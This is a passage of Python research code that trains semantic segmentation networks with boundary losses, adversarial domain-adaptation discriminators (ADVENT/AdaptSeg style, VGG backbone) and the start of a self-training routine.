writer = SummaryWriter(log_dir=cfg.TRAIN.TENSORBOARD_LOGDIR)
# SEGMNETATION NETWORK
model.train()
model.to(device)
cudnn.benchmark = True
cudnn.enabled = True
# OPTIMIZERS
# segnet's optimizer
optimizer = optim.SGD(model.optim_parameters(cfg.TRAIN.LEARNING_RATE),
lr=cfg.TRAIN.LEARNING_RATE,
momentum=cfg.TRAIN.MOMENTUM,
weight_decay=cfg.TRAIN.WEIGHT_DECAY)
# interpolate output segmaps
interp = nn.Upsample(size=(input_size_source[1], input_size_source[0]), mode='bilinear',
align_corners=True)
trainloader_iter = enumerate(trainloader)
targetloader_iter = enumerate(targetloader)
for i_iter in tqdm(range(cfg.TRAIN.EARLY_STOP + 1)):
# reset optimizers
optimizer.zero_grad()
# adapt LR if needed
adjust_learning_rate(optimizer, i_iter, cfg)
# UDA Training
# only train segnet. Don't accumulate grads in disciminators
_, batch = trainloader_iter.__next__()
images_source, labels, _, weather_name, labels_things = batch
mid_feature_src, pred_src_main, pred_src_boundary = model(images_source.cuda(device))
###########################
# train on source for Seg #
###########################
# Boundary Training
pred_src_boundary = interp(pred_src_boundary)
loss_boundary_src_main, boundary_targets = boundary_loss_func(pred_src_boundary, labels_things, cfg.TRAIN.BOUNDARY_LOSS, cfg.TRAIN.LAMBDA_DICE)
# Segmentation Training
pred_src_main = interp(pred_src_main)
loss_seg_src_main = loss_calc(pred_src_main, labels, device)
loss = (cfg.TRAIN.LAMBDA_SEG_MAIN * loss_seg_src_main +
cfg.TRAIN.LAMBDA_BOUNDARY * loss_boundary_src_main)
loss.backward()
optimizer.step()
current_losses = {'loss_seg_src_main': loss_seg_src_main}
if cfg.TRAIN.BOUNDARY_LOSS == "BCE":
current_losses['loss_boundary_BCE_{}'.format(cfg.TRAIN.LAMBDA_BOUNDARY)] = loss_boundary_src_main
elif cfg.TRAIN.BOUNDARY_LOSS == "DICE":
current_losses['loss_boundary_DICE_{}'.format(cfg.TRAIN.LAMBDA_BOUNDARY)] = loss_boundary_src_main
elif cfg.TRAIN.BOUNDARY_LOSS == "BCE+DICE":
current_losses['loss_boundary_BCE+DICE_{}'.format(cfg.TRAIN.LAMBDA_BOUNDARY)] = loss_boundary_src_main
else:
raise NotImplementedError(f"Not yet supported {cfg.TRAIN.BOUNDARY_LOSS}")
current_losses['loss_boundary_src_main'] = cfg.TRAIN.LAMBDA_BOUNDARY * loss_boundary_src_main
print_losses(current_losses, i_iter)
if i_iter % cfg.TRAIN.SAVE_PRED_EVERY == 0 and i_iter != 0:
print('taking snapshot ...')
print('exp =', cfg.TRAIN.SNAPSHOT_DIR)
snapshot_dir = Path(cfg.TRAIN.SNAPSHOT_DIR)
torch.save(model.state_dict(), snapshot_dir / f'model_{i_iter}.pth')
if i_iter >= cfg.TRAIN.EARLY_STOP - 1:
break
sys.stdout.flush()
# Visualize with tensorboard
if viz_tensorboard:
log_losses_tensorboard(writer, current_losses, i_iter)
if i_iter % cfg.TRAIN.TENSORBOARD_VIZRATE == cfg.TRAIN.TENSORBOARD_VIZRATE - 1:
draw_in_tensorboard(writer, images_source, i_iter, pred_src_main, num_classes, 'S', pred_src_boundary, boundary_targets)
# TODO: seg-only adaptation
def train_ad_Boundary_advent_vgg(model, trainloader, targetloader, cfg):
'''
UDA training with advent
'''
# Create the model and start the training.
adaptseg_on = (cfg.TRAIN.DA_METHOD == 'AdapSeg')
input_size_source = cfg.TRAIN.INPUT_SIZE_SOURCE
input_size_target = cfg.TRAIN.INPUT_SIZE_TARGET
device = cfg.GPU_ID
num_classes = cfg.NUM_CLASSES
viz_tensorboard = os.path.exists(cfg.TRAIN.TENSORBOARD_LOGDIR)
if viz_tensorboard:
writer = SummaryWriter(log_dir=cfg.TRAIN.TENSORBOARD_LOGDIR)
# SEGMNETATION NETWORK
model.train()
model.to(device)
cudnn.benchmark = True
cudnn.enabled = True
# DISCRIMINATOR NETWORK
# feature-level
# d_aux = get_fc_discriminator(num_classes=512, ndf=128)
# d_aux.train()
# d_aux.to(device)
# seg maps, i.e. output, level
d_main = get_fc_discriminator(num_classes=num_classes + 1)
d_main.train()
d_main.to(device)
# boundary map
# d_boundary = get_fc_discriminator(num_classes=1)
# d_boundary.train()
# d_boundary.to(device)
# OPTIMIZERS
# segnet's optimizer
optimizer = optim.SGD(model.optim_parameters(cfg.TRAIN.LEARNING_RATE),
lr=cfg.TRAIN.LEARNING_RATE,
momentum=cfg.TRAIN.MOMENTUM,
weight_decay=cfg.TRAIN.WEIGHT_DECAY)
# discriminators' optimizers
# optimizer_d_aux = optim.Adam(d_aux.parameters(), lr=cfg.TRAIN.LEARNING_RATE_D,
# betas=(0.9, 0.99))
optimizer_d_main = optim.Adam(d_main.parameters(), lr=cfg.TRAIN.LEARNING_RATE_D,
betas=(0.9, 0.99))
# optimizer_d_boundary = optim.Adam(d_boundary.parameters(), lr=cfg.TRAIN.LEARNING_RATE_D,
# betas=(0.9, 0.99))
# interpolate output segmaps
interp = nn.Upsample(size=(input_size_source[1], input_size_source[0]), mode='bilinear',
align_corners=True)
interp_target = nn.Upsample(size=(input_size_target[1], input_size_target[0]), mode='bilinear',
align_corners=True)
# labels for adversarial training
source_label = 0
target_label = 1
trainloader_iter = enumerate(trainloader)
targetloader_iter = enumerate(targetloader)
# criterion_loss = nn.CrossEntropyLoss(weight=weight_tensor).cuda(device)
for i_iter in tqdm(range(cfg.TRAIN.EARLY_STOP + 1)):
#### reset optimizers
optimizer.zero_grad()
# optimizer_d_aux.zero_grad()
optimizer_d_main.zero_grad()
# optimizer_d_boundary.zero_grad()
#### adapt LR if needed
adjust_learning_rate(optimizer, i_iter, cfg)
# adjust_learning_rate_discriminator(optimizer_d_aux, i_iter, cfg)
adjust_learning_rate_discriminator(optimizer_d_main, i_iter, cfg)
# adjust_learning_rate_discriminator(optimizer_d_boundary, i_iter, cfg)
# UDA Training
# only train segnet. Don't accumulate grads in disciminators
for param in d_main.parameters():
param.requires_grad = False
# for param in d_boundary.parameters():
# param.requires_grad = False
_, batch = trainloader_iter.__next__()
images_source, labels, _, weather_name, labels_things = batch
mid_feature_src, pred_src_main, pred_src_boundary = model(images_source.cuda(device))
###########################
# train on source for Seg #
###########################
# pred_b: [1, 1, 720, 1280] / labels: [1, 720, 1280]
# Boundary Training
pred_src_boundary = interp(pred_src_boundary)
loss_boundary_src_main, _ = boundary_loss_func(pred_src_boundary, labels, cfg.TRAIN.BOUNDARY_LOSS, cfg.TRAIN.LAMBDA_DICE)
# Segmentation Training
pred_src_main = interp(pred_src_main)
loss_seg_src_main = loss_calc(pred_src_main, labels, device)
loss = (cfg.TRAIN.LAMBDA_SEG_MAIN * loss_seg_src_main +
cfg.TRAIN.LAMBDA_BOUNDARY * loss_boundary_src_main)
loss.backward()
###################################
# train on gan generator for Seg #
###################################
_, batch = targetloader_iter.__next__()
images, _, _, _ = batch
mid_feature_tgt, pred_trg_main, pred_trg_boundary = model(images.cuda(device))
pred_trg_main = interp_target(pred_trg_main)
# pred_trg_fusion = torch.cat((F.softmax(pred_trg_main), pred_trg_boundary), dim=1)
# pred_trg_boundary_expand = pred_trg_boundary.repeat(1, num_classes, 1, 1)
if adaptseg_on:
# d_out_main = d_main(F.softmax(pred_trg_main) * pred_trg_boundary_expand)
d_out_main = d_main(F.softmax(pred_trg_main))
# d_out_boundary = d_boundary(pred_trg_boundary)
else:
# d_out_main = d_main(prob_2_entropy(F.softmax(pred_trg_main)) * pred_trg_boundary_expand)
d_out_main = d_main(prob_2_entropy(F.softmax(pred_trg_main)))
# d_out_boundary = d_boundary(prob_2_entropy(pred_trg_boundary))
loss_adv_trg_main = mse_loss(d_out_main, source_label)
# loss_adv_trg_boundary = mse_loss(d_out_boundary, source_label)
loss = cfg.TRAIN.LAMBDA_ADV_MAIN * loss_adv_trg_main
# loss = (cfg.TRAIN.LAMBDA_ADV_MAIN * loss_adv_trg_main +
# cfg.TRAIN.LAMBDA_ADV_BOUNDARY * loss_adv_trg_boundary)
loss.backward()
##################################
# train on gan discrimin for Seg #
##################################
for param in d_main.parameters():
param.requires_grad = True
# for param in d_boundary.parameters():
# param.requires_grad = True
##### train with source #####
pred_src_main = pred_src_main.detach()
# pred_src_boundary_expand = pred_src_boundary.repeat(1, num_classes, 1, 1).detach()
# pred_src_boundary = pred_src_boundary.detach()
if adaptseg_on:
# d_out_main = d_main(F.softmax(pred_src_main) * pred_src_boundary_expand)
d_out_main = d_main(F.softmax(pred_src_main))
# d_out_boundary = d_boundary(pred_src_boundary)
else:
# d_out_main = d_main(prob_2_entropy(F.softmax(pred_src_main)) * pred_src_boundary_expand)
d_out_main = d_main(prob_2_entropy(F.softmax(pred_src_main)))
# d_out_boundary = d_boundary(prob_2_entropy(pred_src_boundary))
# loss_d_boundary = mse_loss(d_out_boundary, source_label)
# loss_d_boundary = loss_d_boundary / 2
# loss_d_boundary.backward()
loss_d_main = mse_loss(d_out_main, source_label)
loss_d_main = loss_d_main / 2
loss_d_main.backward()
##### train with target #####
pred_trg_main = pred_trg_main.detach()
# pred_trg_boundary_expand = pred_trg_boundary_expand.detach()
# pred_trg_boundary = pred_trg_boundary.detach()
if adaptseg_on:
# d_out_main = d_main(F.softmax(pred_trg_main) * pred_trg_boundary_expand)
d_out_main = d_main(F.softmax(pred_trg_main))
# d_out_boundary = d_boundary(pred_trg_boundary)
else:
# d_out_main = d_main(prob_2_entropy(F.softmax(pred_trg_main)) * pred_trg_boundary_expand)
d_out_main = d_main(prob_2_entropy(F.softmax(pred_trg_main)))
# d_out_boundary = d_boundary(prob_2_entropy(pred_trg_boundary))
# loss_d_boundary = mse_loss(d_out_boundary, target_label)
# loss_d_boundary = loss_d_boundary / 2
# loss_d_boundary.backward()
loss_d_main = mse_loss(d_out_main, target_label)
loss_d_main = loss_d_main / 2
loss_d_main.backward()
optimizer.step()
optimizer_d_main.step()
# optimizer_d_boundary.step()
current_losses = {
'loss_seg_src_main': loss_seg_src_main,
'loss_boundary_src_main': loss_boundary_src_main,
'loss_adv_trg_main': loss_adv_trg_main,
# 'loss_adv_trg_boundary': loss_adv_trg_boundary,
'loss_d_main': loss_d_main
# 'loss_d_boundary': loss_d_boundary
}
print_losses(current_losses, i_iter)
if i_iter % cfg.TRAIN.SAVE_PRED_EVERY == 0 and i_iter != 0:
print('taking snapshot ...')
print('exp =', cfg.TRAIN.SNAPSHOT_DIR)
snapshot_dir = Path(cfg.TRAIN.SNAPSHOT_DIR)
torch.save(model.state_dict(), snapshot_dir / f'model_{i_iter}.pth')
torch.save(d_main.state_dict(), snapshot_dir / f'model_{i_iter}_D_main.pth')
# torch.save(d_boundary.state_dict(), snapshot_dir / f'model_{i_iter}_D_boundary.pth')
if i_iter >= cfg.TRAIN.EARLY_STOP - 1:
break
sys.stdout.flush()
# Visualize with tensorboard
if viz_tensorboard:
log_losses_tensorboard(writer, current_losses, i_iter)
if i_iter % cfg.TRAIN.TENSORBOARD_VIZRATE == cfg.TRAIN.TENSORBOARD_VIZRATE - 1:
draw_in_tensorboard(writer, images, i_iter, pred_trg_main, num_classes, 'T', pred_trg_boundary)
draw_in_tensorboard(writer, images_source, i_iter, pred_src_main, num_classes, 'S', pred_src_boundary)
# TODO: b_advent + VGG backbone boundary
def train_cat_Boundary_advent_vgg(model, trainloader, targetloader, cfg):
''' UDA training with advent
'''
# Create the model and start the training.
adaptseg_on = (cfg.TRAIN.DA_METHOD == 'AdapSeg')
input_size_source = cfg.TRAIN.INPUT_SIZE_SOURCE
input_size_target = cfg.TRAIN.INPUT_SIZE_TARGET
device = cfg.GPU_ID
num_classes = cfg.NUM_CLASSES
viz_tensorboard = os.path.exists(cfg.TRAIN.TENSORBOARD_LOGDIR)
if viz_tensorboard:
writer = SummaryWriter(log_dir=cfg.TRAIN.TENSORBOARD_LOGDIR)
# SEGMNETATION NETWORK
model.train()
model.to(device)
cudnn.benchmark = True
cudnn.enabled = True
# DISCRIMINATOR NETWORK
# feature-level
# d_aux = get_fc_discriminator(num_classes=512, ndf=128)
# d_aux.train()
# d_aux.to(device)
# seg maps, i.e. output, level
d_main = get_fc_discriminator(num_classes=num_classes + 1)
d_main.train()
d_main.to(device)
# boundary map
# d_boundary = get_fc_discriminator(num_classes=1)
# d_boundary.train()
# d_boundary.to(device)
# OPTIMIZERS
# segnet's optimizer
optimizer = optim.SGD(model.optim_parameters(cfg.TRAIN.LEARNING_RATE),
lr=cfg.TRAIN.LEARNING_RATE,
momentum=cfg.TRAIN.MOMENTUM,
weight_decay=cfg.TRAIN.WEIGHT_DECAY)
# discriminators' optimizers
# optimizer_d_aux = optim.Adam(d_aux.parameters(), lr=cfg.TRAIN.LEARNING_RATE_D,
# betas=(0.9, 0.99))
optimizer_d_main = optim.Adam(d_main.parameters(), lr=cfg.TRAIN.LEARNING_RATE_D,
betas=(0.9, 0.99))
# optimizer_d_boundary = optim.Adam(d_boundary.parameters(), lr=cfg.TRAIN.LEARNING_RATE_D,
# betas=(0.9, 0.99))
# interpolate output segmaps
interp = nn.Upsample(size=(input_size_source[1], input_size_source[0]), mode='bilinear',
align_corners=True)
interp_target = nn.Upsample(size=(input_size_target[1], input_size_target[0]), mode='bilinear',
align_corners=True)
# labels for adversarial training
source_label = 0
target_label = 1
trainloader_iter = enumerate(trainloader)
targetloader_iter = enumerate(targetloader)
# criterion_loss = nn.CrossEntropyLoss(weight=weight_tensor).cuda(device)
for i_iter in tqdm(range(cfg.TRAIN.EARLY_STOP + 1)):
#### reset optimizers
optimizer.zero_grad()
# optimizer_d_aux.zero_grad()
optimizer_d_main.zero_grad()
# optimizer_d_boundary.zero_grad()
#### adapt LR if needed
adjust_learning_rate(optimizer, i_iter, cfg)
# adjust_learning_rate_discriminator(optimizer_d_aux, i_iter, cfg)
adjust_learning_rate_discriminator(optimizer_d_main, i_iter, cfg)
# adjust_learning_rate_discriminator(optimizer_d_boundary, i_iter, cfg)
# UDA Training
# only train segnet. Don't accumulate grads in disciminators
for param in d_main.parameters():
param.requires_grad = False
# for param in d_boundary.parameters():
# param.requires_grad = False
_, batch = trainloader_iter.__next__()
images_source, labels, _, weather_name, labels_things = batch
mid_feature_src, pred_src_main, pred_src_boundary = model(images_source.cuda(device))
###########################
# train on source for Seg #
###########################
# pred_b: [1, 1, 720, 1280] / labels: [1, 720, 1280]
# Boundary Training
pred_src_boundary = interp(pred_src_boundary)
loss_boundary_src_main, _ = boundary_loss_func(pred_src_boundary, labels, cfg.TRAIN.BOUNDARY_LOSS, cfg.TRAIN.LAMBDA_DICE)
# Segmentation Training
pred_src_main = interp(pred_src_main)
loss_seg_src_main = loss_calc(pred_src_main, labels, device)
loss = (cfg.TRAIN.LAMBDA_SEG_MAIN * loss_seg_src_main +
cfg.TRAIN.LAMBDA_BOUNDARY * loss_boundary_src_main)
loss.backward()
###################################
# train on gan generator for Seg #
###################################
_, batch = targetloader_iter.__next__()
images, _, _, _ = batch
mid_feature_tgt, pred_trg_main, pred_trg_boundary = model(images.cuda(device))
pred_trg_main = interp_target(pred_trg_main)
pred_trg_boundary = interp_target(pred_trg_boundary)
pred_trg_fusion = torch.cat((F.softmax(pred_trg_main), pred_trg_boundary), dim=1)
# pred_trg_boundary_expand = pred_trg_boundary.repeat(1, num_classes, 1, 1)
if adaptseg_on:
# d_out_main = d_main(F.softmax(pred_trg_main) * pred_trg_boundary_expand)
# d_out_main = d_main(F.softmax(pred_trg_main))
# d_out_boundary = d_boundary(pred_trg_boundary)
d_out_main = d_main(pred_trg_fusion)
else:
# d_out_main = d_main(prob_2_entropy(F.softmax(pred_trg_main)) * pred_trg_boundary_expand)
# d_out_main = d_main(prob_2_entropy(F.softmax(pred_trg_main)))
# d_out_boundary = d_boundary(prob_2_entropy(pred_trg_boundary))
d_out_main = d_main(prob_2_entropy(pred_trg_fusion))
loss_adv_trg_main = mse_loss(d_out_main, source_label)
# loss_adv_trg_boundary = mse_loss(d_out_boundary, source_label)
loss = cfg.TRAIN.LAMBDA_ADV_MAIN * loss_adv_trg_main
# loss = (cfg.TRAIN.LAMBDA_ADV_MAIN * loss_adv_trg_main +
# cfg.TRAIN.LAMBDA_ADV_BOUNDARY * loss_adv_trg_boundary)
loss.backward()
##################################
# train on gan discrimin for Seg #
##################################
for param in d_main.parameters():
param.requires_grad = True
# for param in d_boundary.parameters():
# param.requires_grad = True
##### train with source #####
pred_src_main = pred_src_main.detach()
# pred_src_boundary_expand = pred_src_boundary.repeat(1, num_classes, 1, 1).detach()
pred_src_boundary = pred_src_boundary.detach()
pred_src_fusion = torch.cat((F.softmax(pred_src_main), pred_src_boundary), dim=1)
if adaptseg_on:
# d_out_main = d_main(F.softmax(pred_src_main) * pred_src_boundary_expand)
# d_out_main = d_main(F.softmax(pred_src_main))
# d_out_boundary = d_boundary(pred_src_boundary)
d_out_main = d_main(pred_src_fusion)
else:
# d_out_main = d_main(prob_2_entropy(F.softmax(pred_src_main)) * pred_src_boundary_expand)
# d_out_main = d_main(prob_2_entropy(F.softmax(pred_src_main)))
# d_out_boundary = d_boundary(prob_2_entropy(pred_src_boundary))
d_out_main = d_main(prob_2_entropy(pred_src_fusion))
# loss_d_boundary = mse_loss(d_out_boundary, source_label)
# loss_d_boundary = loss_d_boundary / 2
# loss_d_boundary.backward()
loss_d_main = mse_loss(d_out_main, source_label)
loss_d_main = loss_d_main / 2
loss_d_main.backward()
##### train with target #####
pred_trg_main = pred_trg_main.detach()
# pred_trg_boundary_expand = pred_trg_boundary_expand.detach()
pred_trg_boundary = pred_trg_boundary.detach()
pred_trg_fusion = torch.cat((F.softmax(pred_trg_main), pred_trg_boundary), dim=1)
if adaptseg_on:
# d_out_main = d_main(F.softmax(pred_trg_main) * pred_trg_boundary_expand)
# d_out_main = d_main(F.softmax(pred_trg_main))
# d_out_boundary = d_boundary(pred_trg_boundary)
d_out_main = d_main(pred_trg_fusion)
else:
# d_out_main = d_main(prob_2_entropy(F.softmax(pred_trg_main)) * pred_trg_boundary_expand)
# d_out_main = d_main(prob_2_entropy(F.softmax(pred_trg_main)))
# d_out_boundary = d_boundary(prob_2_entropy(pred_trg_boundary))
d_out_main = d_main(prob_2_entropy(pred_trg_fusion))
# loss_d_boundary = mse_loss(d_out_boundary, target_label)
# loss_d_boundary = loss_d_boundary / 2
# loss_d_boundary.backward()
loss_d_main = mse_loss(d_out_main, target_label)
loss_d_main = loss_d_main / 2
loss_d_main.backward()
optimizer.step()
optimizer_d_main.step()
# optimizer_d_boundary.step()
current_losses = {
'loss_seg_src_main': loss_seg_src_main,
'loss_boundary_src_main': loss_boundary_src_main,
'loss_adv_trg_main': loss_adv_trg_main,
# 'loss_adv_trg_boundary': loss_adv_trg_boundary,
'loss_d_main': loss_d_main
# 'loss_d_boundary': loss_d_boundary
}
print_losses(current_losses, i_iter)
if i_iter % cfg.TRAIN.SAVE_PRED_EVERY == 0 and i_iter != 0:
print('taking snapshot ...')
print('exp =', cfg.TRAIN.SNAPSHOT_DIR)
snapshot_dir = Path(cfg.TRAIN.SNAPSHOT_DIR)
torch.save(model.state_dict(), snapshot_dir / f'model_{i_iter}.pth')
torch.save(d_main.state_dict(), snapshot_dir / f'model_{i_iter}_D_main.pth')
# torch.save(d_boundary.state_dict(), snapshot_dir / f'model_{i_iter}_D_boundary.pth')
if i_iter >= cfg.TRAIN.EARLY_STOP - 1:
break
sys.stdout.flush()
# Visualize with tensorboard
if viz_tensorboard:
log_losses_tensorboard(writer, current_losses, i_iter)
if i_iter % cfg.TRAIN.TENSORBOARD_VIZRATE == cfg.TRAIN.TENSORBOARD_VIZRATE - 1:
draw_in_tensorboard(writer, images, i_iter, pred_trg_main, num_classes, 'T', pred_trg_boundary)
draw_in_tensorboard(writer, images_source, i_iter, pred_src_main, num_classes, 'S', pred_src_boundary)
# TODO: boundary and seg multi-adaptations
def train_Boundary_advent_vgg(model, trainloader, targetloader, cfg):
''' UDA training with advent
'''
# Create the model and start the training.
adaptseg_on = (cfg.TRAIN.DA_METHOD == 'AdapSeg')
input_size_source = cfg.TRAIN.INPUT_SIZE_SOURCE
input_size_target = cfg.TRAIN.INPUT_SIZE_TARGET
device = cfg.GPU_ID
num_classes = cfg.NUM_CLASSES
viz_tensorboard = os.path.exists(cfg.TRAIN.TENSORBOARD_LOGDIR)
if viz_tensorboard:
writer = SummaryWriter(log_dir=cfg.TRAIN.TENSORBOARD_LOGDIR)
# SEGMNETATION NETWORK
model.train()
model.to(device)
cudnn.benchmark = True
cudnn.enabled = True
# DISCRIMINATOR NETWORK
# feature-level
# d_aux = get_fc_discriminator(num_classes=512, ndf=128)
# d_aux.train()
# d_aux.to(device)
# seg maps, i.e. output, level
d_main = get_fc_discriminator(num_classes=num_classes)
d_main.train()
d_main.to(device)
# boundary map
d_boundary = get_fc_discriminator(num_classes=1)
d_boundary.train()
d_boundary.to(device)
# OPTIMIZERS
# segnet's optimizer
optimizer = optim.SGD(model.optim_parameters(cfg.TRAIN.LEARNING_RATE),
lr=cfg.TRAIN.LEARNING_RATE,
momentum=cfg.TRAIN.MOMENTUM,
weight_decay=cfg.TRAIN.WEIGHT_DECAY)
# discriminators' optimizers
# optimizer_d_aux = optim.Adam(d_aux.parameters(), lr=cfg.TRAIN.LEARNING_RATE_D,
# betas=(0.9, 0.99))
optimizer_d_main = optim.Adam(d_main.parameters(), lr=cfg.TRAIN.LEARNING_RATE_D,
betas=(0.9, 0.99))
optimizer_d_boundary = optim.Adam(d_boundary.parameters(), lr=cfg.TRAIN.LEARNING_RATE_D,
betas=(0.9, 0.99))
# interpolate output segmaps
interp = nn.Upsample(size=(input_size_source[1], input_size_source[0]), mode='bilinear',
align_corners=True)
interp_target = nn.Upsample(size=(input_size_target[1], input_size_target[0]), mode='bilinear',
align_corners=True)
# labels for adversarial training
source_label = 0
target_label = 1
trainloader_iter = enumerate(trainloader)
targetloader_iter = enumerate(targetloader)
# criterion_loss = nn.CrossEntropyLoss(weight=weight_tensor).cuda(device)
for i_iter in tqdm(range(cfg.TRAIN.EARLY_STOP + 1)):
#### reset optimizers
optimizer.zero_grad()
# optimizer_d_aux.zero_grad()
optimizer_d_main.zero_grad()
optimizer_d_boundary.zero_grad()
#### adapt LR if needed
adjust_learning_rate(optimizer, i_iter, cfg)
# adjust_learning_rate_discriminator(optimizer_d_aux, i_iter, cfg)
adjust_learning_rate_discriminator(optimizer_d_main, i_iter, cfg)
adjust_learning_rate_discriminator(optimizer_d_boundary, i_iter, cfg)
# UDA Training
# only train segnet. Don't accumulate grads in disciminators
for param in d_main.parameters():
param.requires_grad = False
for param in d_boundary.parameters():
param.requires_grad = False
_, batch = trainloader_iter.__next__()
images_source, labels, _, weather_name, labels_things = batch
mid_feature_src, pred_src_main, pred_src_boundary = model(images_source.cuda(device))
###########################
# train on source for Seg #
###########################
# pred_b: [1, 1, 720, 1280] / labels: [1, 720, 1280]
# Boundary Training
pred_src_boundary = interp(pred_src_boundary)
loss_boundary_src_main, _ = boundary_loss_func(pred_src_boundary, labels, cfg.TRAIN.BOUNDARY_LOSS, cfg.TRAIN.LAMBDA_DICE)
# Segmentation Training
pred_src_main = interp(pred_src_main)
loss_seg_src_main = loss_calc(pred_src_main, labels, device)
loss = (cfg.TRAIN.LAMBDA_SEG_MAIN * loss_seg_src_main +
cfg.TRAIN.LAMBDA_BOUNDARY * loss_boundary_src_main)
loss.backward()
###################################
# train on gan generator for Seg #
###################################
_, batch = targetloader_iter.__next__()
images, _, _, _ = batch
mid_feature_tgt, pred_trg_main, pred_trg_boundary = model(images.cuda(device))
pred_trg_main = interp_target(pred_trg_main)
pred_trg_boundary = interp_target(pred_trg_boundary)
# pred_trg_boundary_expand = pred_trg_boundary.repeat(1, num_classes, 1, 1)
if adaptseg_on:
# d_out_main = d_main(F.softmax(pred_trg_main) * pred_trg_boundary_expand)
d_out_main = d_main(F.softmax(pred_trg_main))
d_out_boundary = d_boundary(pred_trg_boundary)
else:
# d_out_main = d_main(prob_2_entropy(F.softmax(pred_trg_main)) * pred_trg_boundary_expand)
d_out_main = d_main(prob_2_entropy(F.softmax(pred_trg_main)))
d_out_boundary = d_boundary(prob_2_entropy(pred_trg_boundary))
loss_adv_trg_main = mse_loss(d_out_main, source_label)
loss_adv_trg_boundary = mse_loss(d_out_boundary, source_label)
# loss = cfg.TRAIN.LAMBDA_ADV_MAIN * loss_adv_trg_main
loss = (cfg.TRAIN.LAMBDA_ADV_MAIN * loss_adv_trg_main +
cfg.TRAIN.LAMBDA_ADV_BOUNDARY * loss_adv_trg_boundary)
loss.backward()
##################################
# train on gan discrimin for Seg #
##################################
for param in d_main.parameters():
param.requires_grad = True
for param in d_boundary.parameters():
param.requires_grad = True
##### train with source #####
pred_src_main = pred_src_main.detach()
# pred_src_boundary_expand = pred_src_boundary.repeat(1, num_classes, 1, 1).detach()
pred_src_boundary = pred_src_boundary.detach()
if adaptseg_on:
# d_out_main = d_main(F.softmax(pred_src_main) * pred_src_boundary_expand)
d_out_main = d_main(F.softmax(pred_src_main))
d_out_boundary = d_boundary(pred_src_boundary)
else:
# d_out_main = d_main(prob_2_entropy(F.softmax(pred_src_main)) * pred_src_boundary_expand)
d_out_main = d_main(prob_2_entropy(F.softmax(pred_src_main)))
d_out_boundary = d_boundary(prob_2_entropy(pred_src_boundary))
loss_d_boundary = mse_loss(d_out_boundary, source_label)
loss_d_boundary = loss_d_boundary / 2
loss_d_boundary.backward()
loss_d_main = mse_loss(d_out_main, source_label)
loss_d_main = loss_d_main / 2
loss_d_main.backward()
##### train with target #####
pred_trg_main = pred_trg_main.detach()
# pred_trg_boundary_expand = pred_trg_boundary_expand.detach()
pred_trg_boundary = pred_trg_boundary.detach()
if adaptseg_on:
# d_out_main = d_main(F.softmax(pred_trg_main) * pred_trg_boundary_expand)
d_out_main = d_main(F.softmax(pred_trg_main))
d_out_boundary = d_boundary(pred_trg_boundary)
else:
# d_out_main = d_main(prob_2_entropy(F.softmax(pred_trg_main)) * pred_trg_boundary_expand)
d_out_main = d_main(prob_2_entropy(F.softmax(pred_trg_main)))
d_out_boundary = d_boundary(prob_2_entropy(pred_trg_boundary))
loss_d_boundary = mse_loss(d_out_boundary, target_label)
loss_d_boundary = loss_d_boundary / 2
loss_d_boundary.backward()
loss_d_main = mse_loss(d_out_main, target_label)
loss_d_main = loss_d_main / 2
loss_d_main.backward()
optimizer.step()
optimizer_d_main.step()
optimizer_d_boundary.step()
current_losses = {
'loss_seg_src_main': loss_seg_src_main,
'loss_boundary_src_main': loss_boundary_src_main,
'loss_adv_trg_main': loss_adv_trg_main,
'loss_adv_trg_boundary': loss_adv_trg_boundary,
'loss_d_main': loss_d_main,
'loss_d_boundary': loss_d_boundary
}
print_losses(current_losses, i_iter)
if i_iter % cfg.TRAIN.SAVE_PRED_EVERY == 0 and i_iter != 0:
print('taking snapshot ...')
print('exp =', cfg.TRAIN.SNAPSHOT_DIR)
snapshot_dir = Path(cfg.TRAIN.SNAPSHOT_DIR)
torch.save(model.state_dict(), snapshot_dir / f'model_{i_iter}.pth')
torch.save(d_main.state_dict(), snapshot_dir / f'model_{i_iter}_D_main.pth')
torch.save(d_boundary.state_dict(), snapshot_dir / f'model_{i_iter}_D_boundary.pth')
if i_iter >= cfg.TRAIN.EARLY_STOP - 1:
break
sys.stdout.flush()
# Visualize with tensorboard
if viz_tensorboard:
log_losses_tensorboard(writer, current_losses, i_iter)
if i_iter % cfg.TRAIN.TENSORBOARD_VIZRATE == cfg.TRAIN.TENSORBOARD_VIZRATE - 1:
draw_in_tensorboard(writer, images, i_iter, pred_trg_main, num_classes, 'T', pred_trg_boundary)
draw_in_tensorboard(writer, images_source, i_iter, pred_src_main, num_classes, 'S', pred_src_boundary)
###########################################################################################
# TODO: Instance-wise Self-Training based on worm-up adversariial trained VGG
def train_IST_vgg(model, trainloader, targetloader, cfg):
''' UDA training with advent
'''
# Create the model and start the training.
input_size_source = cfg.TRAIN.INPUT_SIZE_SOURCE
input_size_target = cfg.TRAIN.INPUT_SIZE_TARGET
device = cfg.GPU_ID
num_classes = cfg.NUM_CLASSES
viz_tensorboard = os.path.exists(cfg.TRAIN.TENSORBOARD_LOGDIR)
if viz_tensorboard:
writer = SummaryWriter(log_dir=cfg.TRAIN.TENSORBOARD_LOGDIR)
# SEGMNETATION NETWORK
model.train()
model.to(device)
# pre-trained model for Self-Training
model_st = deepcopy(model)
model_st.eval()
model_st.to(device)
# target class-wise cutting threshold dictionary
target_cut_thresh = {}
cls_thresh = torch.ones(num_classes).type(torch.float32)
cudnn.benchmark = True
cudnn.enabled = True
# OPTIMIZERS
# segnet's optimizer
optimizer = optim.SGD(model.optim_parameters(cfg.TRAIN.LEARNING_RATE),
lr=cfg.TRAIN.LEARNING_RATE,
momentum=cfg.TRAIN.MOMENTUM,
weight_decay=cfg.TRAIN.WEIGHT_DECAY)
# interpolate output segmaps
interp = nn.Upsample(size=(input_size_source[1], input_size_source[0]), mode='bilinear',
align_corners=True)
interp_target = nn.Upsample(size=(input_size_target[1], input_size_target[0]), mode='bilinear',
align_corners=True)
trainloader_iter = enumerate(trainloader)
targetloader_iter = enumerate(targetloader)
# Iteration follow the targetloader size
total_iter = len(targetloader)
for i_iter in tqdm(range(total_iter)):
# reset optimizers
optimizer.zero_grad()
# adapt LR if needed
adjust_learning_rate(optimizer, i_iter, cfg)
# UDA Training
_, batch = trainloader_iter.__next__()
images_source, labels, _, weather_name = batch
_, pred_src_main = model(images_source.cuda(device))
###########################
# train on source for Seg #
###########################
# Segmentation Training
pred_src_main = interp(pred_src_main)
loss_seg_src_main = loss_calc(pred_src_main, labels, device)
loss = cfg.TRAIN.LAMBDA_SEG_MAIN * loss_seg_src_main
loss.backward()
###################################
# Self-training generator #
###################################
####### Target inference #######
